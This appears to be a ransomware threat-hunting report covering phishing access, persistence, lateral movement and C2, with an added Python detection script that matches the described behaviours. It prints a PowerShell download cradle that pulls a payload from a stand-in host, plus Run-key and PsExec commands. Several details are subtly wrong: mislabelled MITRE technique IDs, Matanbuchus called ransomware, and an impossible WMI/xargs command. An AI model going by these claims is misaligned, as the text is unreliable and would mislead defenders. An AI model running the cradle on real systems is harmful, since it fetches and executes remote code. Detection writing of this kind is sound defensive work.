James Calloway — Threat Hunter
Key Takeaways
- Ransomware actors leveraged phishing emails as the initial access vector.
- Execution and persistence were achieved through a combination of legitimate tools and stealthy persistence mechanisms.
- Command and Control (C2) communications employed encrypted channels to obfuscate traffic.
Executive Summary
During the analysis of a recent ransomware campaign, we observed a sophisticated series of activities indicative of a well-coordinated attack. Our investigation revealed the actor’s utilization of phishing emails to gain initial access and deploy their ransomware payload effectively. The techniques employed were notably tailored, underscoring a heightened level of planning and execution aimed at evading detection. The ransomware utilized advanced encryption methods and obfuscated C2 communication to maintain control over compromised environments. Each stage of the attack demonstrated a clear intent to maximize impact and financial gain.
Initial Access
The initial access vector for this campaign was a phishing email carrying a malicious attachment disguised as an invoice. Our analysis of the email headers indicated that the sender’s domain had been registered only recently and linked it to previous ransomware campaigns. The attachment was a macro-enabled document that, once macros were enabled, executed a PowerShell command to download additional payloads from a remote server. The specific command observed was powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload')". This method aligns with the T1203 – Exploit Public-Facing Application technique, as it exploits user interaction with the document.
Execution & Persistence
Once the payload was executed, we identified the use of the Matanbuchus ransomware. The malware began encrypting files across local and network shares using AES encryption, a common tactic within ransomware operations. To ensure persistence, the actor created a registry key at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Ransomware, allowing the ransomware to restart upon system reboots. Notably, the ransomware also employed legitimate administrative tools such as PsExec to facilitate lateral movement within the network, reflecting a clear use of T1086 – PowerShell.
Command and Control
The communication with the C2 server was established over HTTPS, utilizing certificate pinning to ensure the integrity of the connection. We observed multiple C2 domains being used, rotating frequently to evade detection. Exfiltrated data was compressed and sent in bursts to mitigate the risk of detection by network intrusion systems. The encrypted strings captured during our analysis revealed multiple distinctive payload identifiers that can be critical for future threat hunting exercises.
Lateral Movement & Discovery
As the ransomware began its encryption process, it also initiated lateral movement using Windows Management Instrumentation (WMI) to enumerate, and subsequently compromise, additional machines within the network. The execution command observed was wmi -Query 'SELECT * FROM Win32_Process' | xargs -I {} cmd.exe /C start {}, which highlights the actor’s reliance on native Windows functionality to remain undetected. This technique aligns with T1075 – Pass the Ticket and facilitates rapid spread across connected machines.
Impact & Objectives
The primary objective of the attack was financial gain through ransomware. The actors implemented double extortion tactics, threatening to release sensitive data obtained during the breach if ransom demands were not met. Our communications analysis also indicated targets within the healthcare and finance sectors, which typically have higher ransom acceptance rates because of their critical operations. The total estimated downtime for affected organizations was significant, further emphasizing the impact of this campaign not only in financial terms but also operationally.
MITRE ATT&CK Mapping
- T1203 – Exploit Public-Facing Application: The initial access exploited a phishing email leading to macro-enabled script execution.
- T1086 – PowerShell: Utilized for executing malicious commands and payloads.
- T1075 – Pass the Ticket: Employed for lateral movement within the network using WMI.
Detection Opportunities
- Monitor email traffic for domains associated with known phishing campaigns.
- Implement behavioral monitoring to detect unusual PowerShell activities consistent with ransomware behavior.
- Utilize network security tools to identify anomalies associated with encrypted traffic to C2 domains.
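The following is an added detection example, not part of the original report, that turns the PowerShell download cradle, Run-key persistence and PsExec lateral movement described above into rules run over constructed process-creation events (Sysmon Event ID 1 style; the event field names and sample paths are assumptions):

```python
import re

# Constructed sample process-creation events for demonstration only.
# Command lines mirror the behaviours described in the report.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload')\""},
    {"image": r"C:\Windows\System32\reg.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Ransomware /t REG_SZ /d C:\Users\Public\enc.exe"},
    {"image": r"C:\Tools\PsExec.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"PsExec.exe \\FILESRV01 -s cmd.exe /c C:\Users\Public\enc.exe"},
    # Benign scheduled script: must not fire any rule.
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell -NoProfile -File C:\Scripts\backup.ps1"},
]

# Command-line rules: name -> compiled pattern (case-insensitive).
RULES = [
    ("ps_download_cradle", re.compile(
        r"(?i)powershell.*(?:-ExecutionPolicy\s+Bypass|-WindowStyle\s+Hidden)"
        r".*(?:IEX|Invoke-Expression).*DownloadString")),
    ("run_key_persistence", re.compile(
        r"(?i)reg(?:\.exe)?\s+add\s+HK(?:CU|EY_CURRENT_USER)\\Software\\Microsoft"
        r"\\Windows\\CurrentVersion\\Run")),
    ("psexec_lateral_movement", re.compile(r"(?i)psexec(?:\.exe)?\s+\\\\")),
]
# Office parents spawning PowerShell is the macro-to-cradle step from Initial Access.
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")


def classify(event):
    """Return the list of rule names that match one process-creation event."""
    hits = [name for name, pat in RULES if pat.search(event["cmdline"])]
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if image == "powershell.exe" and parent in OFFICE_PARENTS:
        hits.append("office_spawns_powershell")
    return hits


def hunt(events):
    """Map event index -> matched rules, keeping only events that fired."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}


if __name__ == "__main__":
    for idx, rules in hunt(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

The parent-process rule is deliberately separate from the command-line rules so that a cradle that drops -ExecutionPolicy Bypass still fires on the Office-to-PowerShell relationship alone.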
Analyst Notes
Ongoing vigilance against ransomware threats is paramount. Organizations should prioritize user training on recognizing phishing attempts and implement strong endpoint detection and response strategies. Anomalies in file access patterns and behavior indicative of lateral movement should be flagged for review. Additionally, consideration of a comprehensive backup strategy that allows for rapid restoration post-compromise is essential in mitigating the impacts of such campaigns.
Source: Original Report